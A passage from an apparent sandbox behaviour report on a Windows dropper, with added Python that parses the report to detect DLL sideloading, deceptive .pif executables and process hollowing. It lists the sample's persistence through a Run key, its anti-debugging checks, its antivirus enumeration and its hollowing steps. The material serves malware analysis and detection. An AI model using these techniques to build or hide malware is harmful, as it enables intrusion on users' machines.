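    for proc, mods in parse_rows(lines).items():
        low = proc.lower()
        if any(p in low for p in USER_WRITABLE):
            findings.append((proc, "process image in user-writable directory"))
        if low.endswith(DECEPTIVE_EXT):
            findings.append((proc, "executable with legacy/deceptive extension"))
        for mod in dict.fromkeys(mods):  # first occurrence only, order preserved
            stem = mod.rsplit(".", 1)[0]
            if not DLL_NAME.fullmatch(mod):
                findings.append((proc, f"module name {mod!r} is not a plausible DLL file name"))
            elif len(stem) < MIN_STEM:
                findings.append((proc, f"very short module name {mod!r}"))
            if mod.lower() in dropped:
                findings.append((proc, f"loaded {mod}, which the sample also dropped (possible sideload)"))
    return findings


# Sample rows: the first six are copied from the report, the wscript.exe row is
# constructed in the separated form to act as a benign control.
SAMPLE_ROWS = [
    r"Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: netapi32.dllJump to behavior",
    r"Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: wkscli.dllJump to behavior",
    r"Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: netutils.dllJump to behavior",
    r"Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior",
    r"Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ???.dllJump to behavior",
    r"Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: schannel.dllJump to behavior",
    r"Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll",
]
# File names taken from the report's ".dr" (dropped file) entries
DROPPED = ["x.exe", "NETUTILS.dll", "svchost.pif", "Uhzauuil.PIF", "liuuazhU.pif"]

if __name__ == "__main__":
    for proc, finding in analyse(SAMPLE_ROWS, DROPPED):
        print(f"{proc}: {finding}")
```

The sideload check deliberately compares basenames only: the report lists the dropped NETUTILS.dll without a directory, and a hijack works precisely because the loader resolves the short name through the search order rather than a fixed path. The implausible-name check catches the "???.dll" rows, which stand for module names the report could not render; whether they are non-printable bytes or non-Latin characters cannot be decided from the page, so the finding only says the name is not one a normal import table carries.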

            Data Obfuscation

            Source: C:\Users\Public\Libraries\liuuazhU.pif | Unpacked PE file: 6.2.liuuazhU.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Unpacked PE file: 11.2.liuuazhU.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Unpacked PE file: 17.2.liuuazhU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Unpacked PE file: 6.2.liuuazhU.pif.400000.1.unpack
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Unpacked PE file: 11.2.liuuazhU.pif.400000.2.unpack
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Unpacked PE file: 17.2.liuuazhU.pif.400000.0.unpack
            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe");
            Source: Yara match | File source: 1.2.x.exe.27d0000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000003.1799207040.000000007FCB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: liuuazhU.pif.1.dr | Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_027E8818 LoadLibraryW,GetProcAddress,FreeLibrary, | 1_2_027E8818
            Source: initial sample | Static PE information: section where entry point is pointing to: .
            Source: x.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0xdc457
            Source: NETUTILS.dll.1.dr | Static PE information: real checksum: 0x273f3 should be: 0x26a85
            Source: Uhzauuil.PIF.1.dr | Static PE information: real checksum: 0x0 should be: 0xdc457
            Source: svchost.pif.1.dr | Static PE information: section name: .imrsiv
            Source: svchost.pif.1.dr | Static PE information: section name: .didat
            Source: NETUTILS.dll.1.dr | Static PE information: section name: .
            Source: NETUTILS.dll.1.dr | Static PE information: section name: .
            Source: NETUTILS.dll.1.dr | Static PE information: section name: .
            Source: NETUTILS.dll.1.dr | Static PE information: section name: .
            Source: NETUTILS.dll.1.dr | Static PE information: section name: .
            Source: NETUTILS.dll.1.dr | Static PE information: section name: .
            Source: NETUTILS.dll.1.dr | Static PE information: section name: .
            Source: NETUTILS.dll.1.dr | Static PE information: section name: .
            Source: NETUTILS.dll.1.dr | Static PE information: section name: .
            Source: NETUTILS.dll.1.dr | Static PE information: section name: .
            Source: NETUTILS.dll.1.dr | Static PE information: section name: .
            Source: NETUTILS.dll.1.dr | Static PE information: section name: /4
            Source: NETUTILS.dll.1.dr | Static PE information: section name: /19
            Source: NETUTILS.dll.1.dr | Static PE information: section name: /31
            Source: NETUTILS.dll.1.dr | Static PE information: section name: /45
            Source: NETUTILS.dll.1.dr | Static PE information: section name: /57
            Source: NETUTILS.dll.1.dr | Static PE information: section name: /70
            Source: NETUTILS.dll.1.dr | Static PE information: section name: /81
            Source: NETUTILS.dll.1.dr | Static PE information: section name: /92
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FD2FC push 027FD367h; ret 1_2_027FD35F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027DC349 push 8B027DC1h; ret 1_2_027DC34E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D332C push eax; ret 1_2_027D3368
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EF3FC push ecx; mov dword ptr [esp], edx1_2_027EF401
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D63B0 push 027D640Bh; ret 1_2_027D6403
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D63AE push 027D640Bh; ret 1_2_027D6403
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E306C push 027E30B9h; ret 1_2_027E30B1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E306B push 027E30B9h; ret 1_2_027E30B1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FD0AC push 027FD125h; ret 1_2_027FD11D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FD144 push 027FD1ECh; ret 1_2_027FD1E4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FD1F8 push 027FD288h; ret 1_2_027FD280
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FC770 push 027FC76Eh; ret 1_2_027FC766
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E8738 push 027E877Ah; ret 1_2_027E8772
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D6784 push 027D67C6h; ret 1_2_027D67BE
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D6782 push 027D67C6h; ret 1_2_027D67BE
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027DC56C push ecx; mov dword ptr [esp], edx1_2_027DC571
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FC550 push 027FC76Eh; ret 1_2_027FC766
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027DD5A0 push 027DD5CCh; ret 1_2_027DD5C4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027DCA4F push 027DCD72h; ret 1_2_027DCD6A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027DCBEC push 027DCD72h; ret 1_2_027DCD6A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E6948 push 027E69F3h; ret 1_2_027E69EB
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E6946 push 027E69F3h; ret 1_2_027E69EB
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E790C push 027E7989h; ret 1_2_027E7981
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EA998 push 027EA9D0h; ret 1_2_027EA9C8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EA997 push 027EA9D0h; ret 1_2_027EA9C8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E8990 push 027E89C8h; ret 1_2_027E89C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E898E push 027E89C8h; ret 1_2_027E89C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E5E7C push ecx; mov dword ptr [esp], edx1_2_027E5E7E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E2F60 push 027E2FD6h; ret 1_2_027E2FCE
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_00423149 push eax; ret 6_2_00423179

            Persistence and Installation Behavior

            Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Windows \SysWOW64\svchost.pif
            Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\Public\Libraries\Uhzauuil.PIF
            Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Process created: reg.exe
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
            Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Windows \SysWOW64\NETUTILS.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uhzauuil
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_027EA9D4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_027EA9D4
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Memory allocated: 1CFC0000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Memory allocated: 1D420000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Memory allocated: 1D270000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Memory allocated: 2A6B0000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Memory allocated: 2AD30000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Memory allocated: 2A6E0000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Memory allocated: 1C320000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Memory allocated: 1C7F0000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Dropped PE file which has not been started: C:\Windows \SysWOW64\svchost.pif
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | API coverage: 9.9 %
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_027D5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,1_2_027D5908
            Source: x.exe, 00000001.00000002.1855286953.00000000006DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
            Source: x.exe, 00000001.00000002.1855286953.0000000000726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: liuuazhU.pif, 00000006.00000002.3107311092.000000001B365000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
            Source: Uhzauuil.PIF, 0000000A.00000002.1966101985.00000000005B3000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3115243566.0000000028D19000.00000004.00000020.00020000.00000000.sdmp, Uhzauuil.PIF, 00000010.00000002.2047682326.0000000000582000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3108316011.000000001A54B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exe | API call chain: ExitProcess graph end node graph_1-28284
            Source: C:\Users\Public\Libraries\liuuazhU.pif | API call chain: ExitProcess graph end node graph_6-45721
            Source: C:\Users\Public\Libraries\liuuazhU.pif | API call chain: ExitProcess graph end node graph_11-45410
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | API call chain: ExitProcess graph end node
            Source: C:\Users\Public\Libraries\liuuazhU.pif | API call chain: ExitProcess graph end node
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_027EFA38 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,1_2_027EFA38
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Process queried: DebugPort
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Process queried: DebugPort
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Process queried: DebugPort
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 6_2_20185F38 LdrInitializeThunk,LdrInitializeThunk,6_2_20185F38
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_027E8818 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_027E8818
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 6_2_0040ADB0 GetProcessHeap,HeapFree,6_2_0040ADB0
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040E61C
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00416F6A
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 6_2_004123F1 SetUnhandledExceptionFilter,6_2_004123F1
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040CE09
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040E61C
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00416F6A
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 11_2_004123F1 SetUnhandledExceptionFilter,11_2_004123F1
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 11_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_1_0040CE09
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 11_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_1_0040E61C
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 11_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_1_00416F6A
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 11_1_004123F1 SetUnhandledExceptionFilter,11_1_004123F1
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 17_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0040CE09
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 17_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0040E61C
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 17_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00416F6A
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: 17_2_004123F1 SetUnhandledExceptionFilter,17_2_004123F1
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\wscript.exe | File created: x.exe.0.dr
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory allocated: C:\Users\Public\Libraries\liuuazhU.pif base: 400000 protect: page execute and read and write
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Memory allocated: C:\Users\Public\Libraries\liuuazhU.pif base: 400000 protect: page execute and read and write
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Memory allocated: C:\Users\Public\Libraries\liuuazhU.pif base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Section unmapped: C:\Users\Public\Libraries\liuuazhU.pif base address: 400000
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section unmapped: C:\Users\Public\Libraries\liuuazhU.pif base address: 400000
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section unmapped: C:\Users\Public\Libraries\liuuazhU.pif base address: 400000
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Users\Public\Libraries\liuuazhU.pif base: 204008
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Memory written: C:\Users\Public\Libraries\liuuazhU.pif base: 295008
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Memory written: C:\Users\Public\Libraries\liuuazhU.pif base: 370008
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Process created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Process created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_027D5ACC
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: GetLocaleInfoA,1_2_027DA7C4
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_027D5BD8
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: GetLocaleInfoA,1_2_027DA810
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: GetLocaleInfoA,6_2_00417A20
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: GetLocaleInfoA,11_2_00417A20
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: GetLocaleInfoA,11_1_00417A20
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02985ACC
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02985BD7
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Code function: GetLocaleInfoA,16_2_0298A810
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Code function: GetLocaleInfoA,17_2_00417A20
            Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_027D920C GetLocalTime,1_2_027D920C
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_027DB78C GetVersionExA,1_2_027DB78C
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
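The "Memory allocated", "Section unmapped", "Memory written" and "Process created" lines above are the evidence behind the report's "Sample uses process hollowing technique" verdict: x.exe and Uhzauuil.PIF each spawn liuuazhU.pif, unmap its image at 0x400000, allocate execute/read/write memory at that same base and write into the child. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses event lines in the layout used in this section and correlates them per actor/target pair into a hollowing finding. The input lines are constructed from this section (same paths and addresses); the regexes, the field names and the PEB write heuristic are the example's own, and that heuristic is an inference the report does not make.

```python
"""Correlate sandbox behaviour events into a process-hollowing finding.

Added example, not part of the Joe Sandbox report or of its tooling. The
input lines are constructed in the layout of this section's event lines;
the paths and addresses in them are the ones the report shows.
"""
import re
from collections import defaultdict

REPORT_LINES = [
    r'Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory allocated: C:\Users\Public\Libraries\liuuazhU.pif base: 400000 protect: page execute and read and write',
    r'Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Memory allocated: C:\Users\Public\Libraries\liuuazhU.pif base: 400000 protect: page execute and read and write',
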